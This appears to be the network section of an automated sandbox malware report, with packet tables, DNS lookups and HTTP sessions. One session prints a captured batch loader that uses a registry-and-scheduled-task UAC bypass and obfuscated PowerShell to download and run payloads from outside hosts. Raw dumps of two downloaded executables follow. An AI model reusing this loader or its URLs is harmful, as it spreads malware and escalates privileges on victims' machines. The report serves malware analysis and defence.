                                                                          Jan 6, 2021 09:57:49.786777020 CET49167443192.168.2.22172.67.8.238
                                                                          Jan 6, 2021 09:57:49.791007996 CET4916980192.168.2.2237.46.150.139
                                                                          Jan 6, 2021 09:57:49.838094950 CET804916937.46.150.139192.168.2.22
                                                                          Jan 6, 2021 09:57:49.843275070 CET4916980192.168.2.2237.46.150.139
                                                                          Jan 6, 2021 09:57:49.843473911 CET4916980192.168.2.2237.46.150.139
                                                                          Jan 6, 2021 09:57:49.893141031 CET804916937.46.150.139192.168.2.22
                                                                          Jan 6, 2021 09:57:49.893182039 CET804916937.46.150.139192.168.2.22
                                                                          Jan 6, 2021 09:57:49.893393993 CET4916980192.168.2.2237.46.150.139
                                                                          Jan 6, 2021 09:57:50.380357027 CET4916980192.168.2.2237.46.150.139
                                                                          Jan 6, 2021 09:57:50.380446911 CET49167443192.168.2.22172.67.8.238
                                                                          Jan 6, 2021 09:57:57.553771019 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.625721931 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.625876904 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.626811028 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.698713064 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699496031 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699543953 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699599028 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699639082 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699683905 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.699695110 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699745893 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699799061 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.699803114 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699841976 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699883938 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699898958 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.699940920 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.700409889 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772084951 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772150993 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772195101 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772232056 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772269964 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772295952 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772310019 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772330046 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772347927 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772387028 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772423029 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772423029 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772470951 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772511959 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772548914 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772551060 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772587061 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772627115 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772659063 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772664070 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772701979 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772739887 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772775888 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772789955 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772833109 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772865057 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772870064 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772941113 CET4917080192.168.2.22195.191.149.103
                                                                          Jan 6, 2021 09:57:57.844769001 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844820976 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844857931 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844897032 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844933987 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844980955 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845024109 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845060110 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845098972 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845136881 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845172882 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845211029 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845248938 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845297098 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845338106 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845375061 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845453978 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845495939 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845531940 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845571041 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845607042 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845643044 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845680952 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845717907 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845777035 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845818996 CET8049170195.191.149.103192.168.2.22

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 6, 2021 09:57:47.724637032 CET5219753192.168.2.228.8.8.8
                                                                          Jan 6, 2021 09:57:47.786196947 CET53521978.8.8.8192.168.2.22
                                                                          Jan 6, 2021 09:57:48.403721094 CET5309953192.168.2.228.8.8.8
                                                                          Jan 6, 2021 09:57:48.461515903 CET53530998.8.8.8192.168.2.22
                                                                          Jan 6, 2021 09:57:48.464165926 CET5283853192.168.2.228.8.8.8
                                                                          Jan 6, 2021 09:57:48.511914015 CET53528388.8.8.8192.168.2.22
                                                                          Jan 6, 2021 09:57:57.448802948 CET6120053192.168.2.228.8.8.8
                                                                          Jan 6, 2021 09:57:57.538116932 CET53612008.8.8.8192.168.2.22
                                                                          Jan 6, 2021 09:59:02.518826962 CET4954853192.168.2.228.8.8.8
                                                                          Jan 6, 2021 09:59:02.602788925 CET53495488.8.8.8192.168.2.22
                                                                          Jan 6, 2021 09:59:02.603570938 CET4954853192.168.2.228.8.8.8
                                                                          Jan 6, 2021 09:59:02.659696102 CET53495488.8.8.8192.168.2.22
                                                                          Jan 6, 2021 09:59:14.369138956 CET5562753192.168.2.228.8.8.8
                                                                          Jan 6, 2021 09:59:14.425939083 CET53556278.8.8.8192.168.2.22
                                                                          Jan 6, 2021 09:59:15.571358919 CET5600953192.168.2.228.8.8.8
                                                                          Jan 6, 2021 09:59:15.676179886 CET53560098.8.8.8192.168.2.22
                                                                          Jan 6, 2021 09:59:15.676975965 CET5600953192.168.2.228.8.8.8
                                                                          Jan 6, 2021 09:59:15.733505964 CET53560098.8.8.8192.168.2.22

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Jan 6, 2021 09:57:47.724637032 CET192.168.2.228.8.8.80x8b6aStandard query (0)cutt.lyA (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:57:57.448802948 CET192.168.2.228.8.8.80xc5acStandard query (0)gtp.bgA (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:02.518826962 CET192.168.2.228.8.8.80xae50Standard query (0)gtp.bgA (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:02.603570938 CET192.168.2.228.8.8.80xae50Standard query (0)gtp.bgA (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:14.369138956 CET192.168.2.228.8.8.80x1e90Standard query (0)ip-api.comA (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:15.571358919 CET192.168.2.228.8.8.80xd1e7Standard query (0)yz.videomarket.euA (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:15.676975965 CET192.168.2.228.8.8.80xd1e7Standard query (0)yz.videomarket.euA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Jan 6, 2021 09:57:47.786196947 CET8.8.8.8192.168.2.220x8b6aNo error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:57:47.786196947 CET8.8.8.8192.168.2.220x8b6aNo error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:57:47.786196947 CET8.8.8.8192.168.2.220x8b6aNo error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:57:57.538116932 CET8.8.8.8192.168.2.220xc5acNo error (0)gtp.bg195.191.149.103A (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:02.602788925 CET8.8.8.8192.168.2.220xae50No error (0)gtp.bg195.191.149.103A (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:02.659696102 CET8.8.8.8192.168.2.220xae50No error (0)gtp.bg195.191.149.103A (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:14.425939083 CET8.8.8.8192.168.2.220x1e90No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:15.676179886 CET8.8.8.8192.168.2.220xd1e7No error (0)yz.videomarket.eu185.157.162.81A (IP address)IN (0x0001)
                                                                          Jan 6, 2021 09:59:15.733505964 CET8.8.8.8192.168.2.220xd1e7No error (0)yz.videomarket.eu185.157.162.81A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • 37.46.150.139
                                                                          • gtp.bg
                                                                          • ip-api.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.224916937.46.150.13980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 6, 2021 09:57:49.843473911 CET72OUTGET /bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat HTTP/1.1
                                                                          Host: 37.46.150.139
                                                                          Connection: Keep-Alive
                                                                          Jan 6, 2021 09:57:49.893141031 CET73INHTTP/1.1 200 OK
                                                                          Date: Wed, 06 Jan 2021 08:57:49 GMT
                                                                          Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12
                                                                          Last-Modified: Wed, 06 Jan 2021 00:16:11 GMT
                                                                          ETag: "926-5b8303afc5750"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 2342
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-msdownload
                                                                          Data Raw: 6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a 73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 34 2d 35 20 64 65 6c 69 6d 73 3d 2e 20 22 20 25 25 69 20 69 6e 20 28 27 76 65 72 27 29 20 64 6f 20 73 65 74 20 56 45 52 53 49 4f 4e 3d 25 25 69 2e 25 25 6a 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 31 30 2e 30 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 31 30 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 28 6e 45 77 2d 6f 42 6a 65 60 63 54 20 4e 65 74 2e 57 65 62 63 4c 60 49 45 4e 74 29 2e 28 27 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 27 29 2e 49 6e 76 6f 6b 65 28 28 27 68 74 27 20 20 2b 20 20 20 27 74 70 73 3a 2f 2f 72 65 62 72 61 6e 64 2e 6c 79 2f 46 42 6f 62 66 75 27 29 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 6f 6b 2e 62 61 74 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 6f 6b 2e 62 61 74 3b 20 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 3a 2f 2f 67 74 70 2e 62 67 2f 6f 70 6b 61 2f 69 6f 70 64 2f 7a 74 79 68 2f 6e 6d 6b 2f 31 76 72 6b 59 32 4f 4d 51 66 63 66 42 67 78 2e 65 78 65 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 73 70 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 73 70 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 44 69 73 6b 43 6c 65 61 6e 75 70 5c 53 69 6c 65 6e 74 43 6c 65 61 6e 75 70 20 2f 49 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 33 20 3e 6e 75 6c 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 46 0d 0a 29 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 36 2e 33 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 38 2e 31 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 28 6e 45 77 2d 6f 42 6a 65 60 63 54 20 4e 65 74 2e 57 65 62 63 4c 60 49 45 4e 74 29 2e 28 27 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 27 29 2e 49 6e 76 6f 6b 65 28 28 27 68 74 27 20 20 2b 20 20 20 27 74 70 73 3a 2f 2f 72 65 62 72 61 6e 64 2e 6c 79 2f 46 42 6f 62 66 75 27 29 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 6f 6b 2e 62 61 74 27 29 3b 53 74 61 72 74 2d 53 6c
                                                                          Data Ascii: mode 18,1color FEsetlocalfor /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%jif "%version%" == "10.0" ( echo "Windows 10 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;&REM " >nultimeout /t 2 >nulschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nultimeout /t 3 >nulreg delete "HKCU\Environment" /v "windir" /F)if "%version%" == "6.3" ( echo "Windows 8.1 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sl


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.2249170195.191.149.10380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 6, 2021 09:57:57.626811028 CET75OUTGET /opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe HTTP/1.1
                                                                          Host: gtp.bg
                                                                          Connection: Keep-Alive
                                                                          Jan 6, 2021 09:57:57.699496031 CET76INHTTP/1.1 200 OK
                                                                          Date: Wed, 06 Jan 2021 08:57:59 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, Keep-Alive
                                                                          Last-Modified: Wed, 06 Jan 2021 00:13:34 GMT
                                                                          ETag: "53b13c0-42e600-5b83031a39cfd"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 4384256
                                                                          Keep-Alive: timeout=3, max=100
                                                                          Content-Type: application/x-msdownload
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6f ff f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 42 00 00 0a 00 00 00 00 00 00 de f8 42 00 00 20 00 00 00 00 43 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 43 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c f8 42 00 4f 00 00 00 00 00 43 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 43 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 d8 42 00 00 20 00 00 00 da 42 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 30 06 00 00 00 00 43 00 00 08 00 00 00 dc 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 43 00 00 02 00 00 00 e4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f8 42 00 00 00 00 00 48 00 00 00 02 00 05 00 20 9c 00 00 54 4f 03 00 03 00 00 00 4d 01 00 06 74 eb 03 00 18 0d 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 dd 00 00 00 01 00 00 11 00 d0 02 00 00 02 28 16 00 00 0a 28 17 00 00 0a 6f 18 00 00 0a 28 19 00 00 0a 72 01 00 00 70 28 1a 00 00 0a 0a 72 05 00 00 70 20 10 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0b 07 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 0c 08 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 39 00 00 70 20 11 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0d 09 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 04 11 04 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 4d 00 00 70 20 12 27 00 00 06 72 19 00 00 70 73 06 00 00 06 13 05 11 05 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 06 11 06 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 2a 22 02 28 1f 00 00 0a 00 2a 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 14 0a 2b 00 06 2a 00 13 30 06 00 73 00 00 00 00 00 00 00 02 28 20 00 00 0a 00 00 02 73 21 00 00 0a 7d 05 00 00 04 02 03 28 07 00 00 06 00 02 02 7b 01 00 00 04 73 11 00 00 06 7d 08 00 00 04 02 02 7b 01 00 00 04 02 7b 08 00 00 04 02 7b 05 00 00 04 73 26 00 00 06 7d 0a 00 00 04 02 02 7b 01 00 00 04 02 7b 02 00 00 04 02 7b 08 00 00 04 02 7b 0a 00 00 04 02 7b 05 00 00 04 73 19 00 00 06 7d 09 00 00 04 2a 00 13 30 06 00 9a 00 00 00 00 00 00 00 02 28 20 00 00 0a 00 00 02 03 7d 01 00 00 04 02 04
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELo_0BB C@ @C@BOC0 C H.textB B `.rsrc0CB@@.reloc CB@BBH TOMt?0((o(rp(rp 'rps%sso (r9p 'rps%sso (rMp 'rps%sso (*"(*0+*0s( s!}({s}{{{s&}{{{{{s}*0( }


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.2249175195.191.149.10380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 6, 2021 09:59:02.751955032 CET4687OUTGET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: gtp.bg
                                                                          Connection: Keep-Alive
                                                                          Jan 6, 2021 09:59:02.824470043 CET4689INHTTP/1.1 200 OK
                                                                          Date: Wed, 06 Jan 2021 08:59:04 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, Keep-Alive
                                                                          Last-Modified: Tue, 05 Jan 2021 13:10:58 GMT
                                                                          ETag: "53b28b5-db800-5b826effab56e"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 899072
                                                                          Keep-Alive: timeout=3, max=100
                                                                          Content-Type: application/x-msdownload
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 11 01 00 50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e 2c 67 a2 db 19 dc 78 9e 90 4d 60 60 e8 11 dd 53 bb 13 0d da 91 cd 52 b9 4f d1 93 ae 5a 77 70 40 29 a0 91 a0 e0 ea f0 20 52 ab ac d6 c3 c8 2f 45 61 3d e9 bd 92 60 74 b6 7d 68 